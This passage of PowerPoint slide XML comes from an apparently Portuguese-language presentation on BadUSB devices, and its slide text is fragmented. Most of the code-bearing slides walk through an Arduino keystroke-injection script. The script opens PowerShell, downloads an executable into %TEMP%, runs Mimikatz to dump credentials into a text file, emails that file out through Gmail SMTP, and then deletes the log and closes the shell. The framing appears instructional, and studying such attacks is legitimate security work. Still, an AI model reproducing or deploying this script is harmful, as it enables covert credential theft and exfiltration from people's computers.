              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t> %TEMP%\\pw.exe");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(500);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powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>");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(300);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SMTPServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t> = 'smtp.gmail.com'");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>  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C580595-2B59-4015-9ED7-EB6F66B063BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6127539" y="2442039"/>
            <a:ext cx="31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Executa comandos do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>Mimikatz</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR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E8023267-D839-443E-A445-4E34ECF23E00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6119620" y="3722420"/>
            <a:ext cx="16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Sai do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>Mimikatz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F738EB83-F435-418C-8E2E-F3A4AA9B880E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6119620" y="4150682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31B7AA2F-A432-4B8D-B9E7-8EB28B3F29BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6119620" y="5007206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Abre um </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>powershell</a:t>
            </a:r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5080ED2E-004D-4D02-B341-39E74A2D1083}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6119620" y="2865896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C249FA7A-906D-4EEC-A912-065F9C19C089}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6119620" y="1581110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219E913-D522-44C8-808B-FD5AE5B2967D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6119620" y="3080027"/>
            <a:ext cx="31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Executa comandos do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>Mimikatz</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR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D0CBC73-F7FB-434C-BF55-DB90B7F12C5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6119620" y="4364813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Remove o executável baixado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25E0E648-EDC4-4C2C-B630-77F3E25142FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6119620" y="5649599"/>
            <a:ext cx="250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 a criação do e-mail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68892C61-A1B4-46E0-A947-5F0BF023D3F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6129290" y="3534338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DA5E755-CB58-4848-B875-01B7E0D234CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6119620" y="938717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E209FED2-7745-4AD6-9338-F33BAA31C873}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6113017" y="5435468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EAA4377F-FF36-4DDF-8CA2-57F7C040D1E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6121406" y="4789662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F0671B5D-21E0-485F-AE8C-0A83B3C1CAEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6125906" y="180309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Executa o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>Mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> e envia a saída para um TXT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946DE069-EA3B-47B8-83A3-BAFF8628EEF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6127540" y="2252452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</p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27680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67" grpId="0"/>
      <p:bldP spid="2" grpId="0"/>
      <p:bldP spid="70" grpId="0"/>
      <p:bldP spid="72" grpId="0"/>
      <p:bldP spid="73" grpId="0"/>
      <p:bldP spid="74" grpId="0"/>
      <p:bldP spid="75" grpId="0"/>
      <p:bldP spid="76" grpId="0"/>
      <p:bldP spid="78" grpId="0"/>
      <p:bldP spid="80" grpId="0"/>
      <p:bldP spid="82" grpId="0"/>
      <p:bldP spid="84" grpId="0"/>
      <p:bldP spid="71" grpId="0"/>
      <p:bldP spid="86" grpId="0"/>
      <p:bldP spid="87" grpId="0"/>
      <p:bldP spid="88" grpId="0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0FAB02AE-19C3-40B6-814E-EA9361516ADD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379324" y="2748942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5868518-6EBC-4ECF-A609-16BC5A3E7B52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379323" y="3814277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D976310-398B-4C8A-8571-98647EB15758}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379323" y="4240411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D69844E6-0198-421A-B9C5-045EF69097A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379323" y="5092679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A46F1DB-1F95-4406-97B0-F442578E5C67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379323" y="2962009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862B990-D89F-4F3C-8B60-B3E35A943F5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379324" y="317507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68BD6A8B-E38F-46AF-9FA7-4802C5E14E7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379324" y="338814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5DCB35-EF7A-43F0-B38A-7F3186F1751B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379324" y="360121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D410C9A3-0391-4F06-BBFB-2A81E014ECAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379324" y="402734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BE0DF08-E6CD-429A-8584-E5B51AF643C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379324" y="4453478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AD354ED-6080-4F61-BA83-A006F998F675}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379324" y="4666545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2EB381DA-8048-4BB7-93B7-583CFE28DAAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379324" y="4879612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E6925F2-EF39-480B-8F30-8E1ADA989A88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379324" y="530574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E62E56C-6C46-4169-A6A5-E2A532679F9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379324" y="5518813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7F9A276E-4521-4E73-B6AD-AAC71FDAAFF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379324" y="573188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324FDFA-E129-46A6-9916-6B541D364E56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379324" y="594495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52B98E18-C09A-48F0-9FEF-64286348DB30}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379324" y="2535875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489E73A4-49E0-4185-A41F-9BD1550B0539}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379324" y="104440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C1658D95-77EA-4836-B78A-C84547479416}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379323" y="1683607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EE3EEFC6-D77B-450F-9AED-E0F91A20DE04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379324" y="125747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100D878-FB96-41C5-AE6E-E639981864D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379324" y="1470540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04B0FC06-F8E2-4AEC-889E-9B38122C5403}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379324" y="189667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9A95314-CF5A-4FA8-BA2F-4A21F4C3C845}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379324" y="2109741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9C7CB026-54DC-46B6-8635-1B4963CF7F26}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379324" y="2322808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o Script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23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typeKey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Net.Mail.SmtpClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0" err="1"/>
              <a:t>SmtpServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>, 587)");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SMTPInfo.EnableSsl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t> = $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0" err="1"/>
              <a:t>true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SMTPInfo.Credentials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System.Net.NetworkCredential</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>(‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>remetente@gmail.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>', ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>senha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>');");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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t> = New-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System.Net.Mail.MailMessage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ReportEmail.From</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t> = ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>remetente@gmail.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>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ReportEmail.To.Add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>(‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>destinatário@gmail.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>')");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ReportEmail.Subject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t> = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0" err="1"/>
              <a:t>BadUSB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0" err="1"/>
              <a:t>Report</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>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ReportEmail.Body</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t> = 'Reporte </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0" err="1"/>
              <a:t>BadUSB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>.'");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ReportEmail.Attachments.Add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>('c:\\pwlog.txt')");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("$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0" err="1"/>
              <a:t>SMTPInfo.Send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0" err="1"/>
              <a:t>ReportEmail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>)");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(1000);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endParaRPr lang="pt-BR" sz="1400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FBE6352-BEC4-4F00-8CF6-EBE4CCACD80D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6147566" y="5440146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</p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27776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67" grpId="0"/>
      <p:bldP spid="2" grpId="0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4D06E353-BA99-4D9E-9956-0A65BD181390}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379324" y="1044406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CC5DE8B0-59D1-4FD5-A60B-368125A97B90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379323" y="1683607"/>
            <a:ext cx="11697179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2AAE98D-A146-45D1-8696-AF1D119A9E8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379324" y="1257473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3B8B585-2251-4B90-8FBF-14E430875C16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379324" y="1470540"/>
            <a:ext cx="11697178" cy="2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F4070393-D3CB-4022-BB48-C6E606E97F26}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379324" y="1896674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3464E15-A13D-4AC9-8389-6981DE8A2F33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379324" y="2109741"/>
            <a:ext cx="11697178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9593B626-7D3A-4694-B53C-8CCD9E8E9CAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5401623" y="931942"/>
            <a:ext cx="20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Apaga o arquivo TXT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BA09CD9-1144-4896-96F7-243A55EA8BF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5407253" y="1378346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Pausa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o Script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24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11DE2-5683-4879-A075-461DCEEBC969}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="288063" y="1019947"/>
            <a:ext cx="104423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del</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t> c:\\pwlog.txt");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delay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>(700);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Keyboard.print</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0" err="1"/>
              <a:t>exit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0" err="1"/>
              <a:t>Keyboard.press</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>(KEY_RETURN);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Keyboard.end</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0" err="1"/>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t> loop() {}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3E9A9E29-A2C8-43B9-8FEB-02711EF80DED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5403370" y="1587147"/>
            <a:ext cx="213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Finaliza o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>powershell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1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71" grpId="0"/>
      <p:bldP spid="76" grpId="0"/>
      <p:bldP spid="67" grpId="0"/>
      <p:bldP spid="2" grpId="0"/>
      <p:bldP spid="8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25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EAA66-24FA-4F6F-8186-215A966DD6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11972" y="1610686"/>
            <a:ext cx="4352715" cy="461948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B59188D-389E-4BE2-A93A-6F5181E02F4C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044921" y="1610686"/>
            <a:ext cx="4610660" cy="3166258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85789512-7E15-43D6-96E8-7C518A554561}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="149766" y="1120469"/>
            <a:ext cx="11722742" cy="41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6DE3CB2-0C0C-4B4A-8EEA-B37A0732CF64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566277" y="1153666"/>
            <a:ext cx="10334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Script em Execução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CD1C351-857A-4553-9193-0BCD6C969873}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="366749" y="1284332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5" grpId="0" animBg="1"/>
      <p:bldP spid="46" grpId="0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dados por E-mail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26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9A4B2A-C8C6-4CF8-BCEE-B3BABF3AFE5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603579" y="1309467"/>
            <a:ext cx="6682244" cy="458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Utilizando um cartão SD para execução de Script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27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0784715-5F3A-464E-A9B0-CD6E7753B110}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-256090" y="1169556"/>
            <a:ext cx="11722742" cy="5402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4688C69-1581-434F-8F0C-D121BA271C9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566276" y="1219301"/>
            <a:ext cx="1125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Algumas versões de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>BadUSB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> possuem um leitor/gravador de SD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>Card</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>, que facilita a inclusão dos scripts</a:t>
            </a:r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D57311-83C4-45D5-82A2-43509CE26694}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="366748" y="1349967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CCCFB977-E03C-4537-8D41-6DD1BA05B1AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-245977" y="1859179"/>
            <a:ext cx="11722742" cy="5402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0777FA70-C8F7-424B-8255-8D3D6F2DE028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="576389" y="1908924"/>
            <a:ext cx="1125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cartão SD elimina a necessidade de upload de um novo sketch a cada necessidade de criação de novo Script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3E8CA80-B7DB-4F44-9CA3-0A3CD66F51B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="376861" y="2039590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E0BA7090-2C63-4FFB-9234-C5014779E5F9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10800000">
            <a:off x="1456036" y="3209232"/>
            <a:ext cx="1150043" cy="2344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7" name="Cubo 56">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{929C40F0-3A01-4398-A6E1-1C180D68E801}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3294944" y="2915737"/>
            <a:ext cx="2470826" cy="676778"/>
          </a:xfrm>
          <a:prstGeom prst="cub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ubo 57">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A685368-A913-44AA-80F3-2C90890B3623}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3294944" y="3524958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ubo 58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CFF72E4-EC73-4A58-8516-50C61BFDBC7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5910996" y="2938440"/>
            <a:ext cx="2470826" cy="676778"/>
          </a:xfrm>
          <a:prstGeom prst="cub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ubo 59">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{937A143F-930F-4E7C-ACEB-5A2C27E30283}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5910996" y="3547661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ubo 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F68A1F9A-4DED-4D73-84C7-47080A78A402}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="8541531" y="2952180"/>
            <a:ext cx="2470826" cy="676778"/>
          </a:xfrm>
          <a:prstGeom prst="cub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Cubo 61">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86574930-9E5F-49A7-8B67-0EA5496B7D4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="8541531" y="3561401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6B3664D-963E-40E9-9F5A-6B55853A2146}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
